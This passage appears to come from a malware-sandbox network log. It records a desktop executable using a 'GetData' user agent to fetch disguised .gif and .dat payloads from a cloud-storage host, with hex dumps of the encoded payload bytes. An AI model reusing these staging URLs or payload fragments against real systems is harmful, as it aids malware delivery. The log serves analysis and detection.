j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-11 03:43:47 UTC	4096	IN	Data Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-11 03:43:47 UTC	4096	IN	Data Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-11 03:43:47 UTC	4096	IN	Data Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49976	39.103.20.105	443	7616	C:\Users\user\Desktop\2976587-987347589.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:43:48 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: 662hfg.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:43:49 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:43:48 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 6781E8F40BFF4B3138A37EF4 Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 20
2025-01-11 03:43:49 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-11 03:43:49 UTC	4096	IN	Data Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
2025-01-11 03:43:49 UTC	3035	IN	Data Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49977	39.103.20.105	443	7616	C:\Users\user\Desktop\2976587-987347589.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:43:50 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: 662hfg.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:43:50 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:43:50 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 6781E8F651FCAD3536DE7014 Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Fri, 10 Jan 2025 12:31:05 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 31
2025-01-11 03:43:50 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-11 03:43:50 UTC	4096	IN	Data Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
2025-01-11 03:43:51 UTC	4096	IN	Data Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49979	39.103.20.105	443	7616	C:\Users\user\Desktop\2976587-987347589.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:44:00 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: 662hfg.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:44:00 UTC	560	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:44:00 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 6781E900F5B7DD3030CFDC7B Accept-Ranges: bytes ETag: "711743729566E50108AEDF7B2949D90F" Last-Modified: Sat, 11 Jan 2025 03:43:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12336687731550963302 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cRdDcpVm5QEIrt97KUnZDw== x-oss-server-time: 7
2025-01-11 03:44:00 UTC	3536	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-11 03:44:00 UTC	4096	IN	Data Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 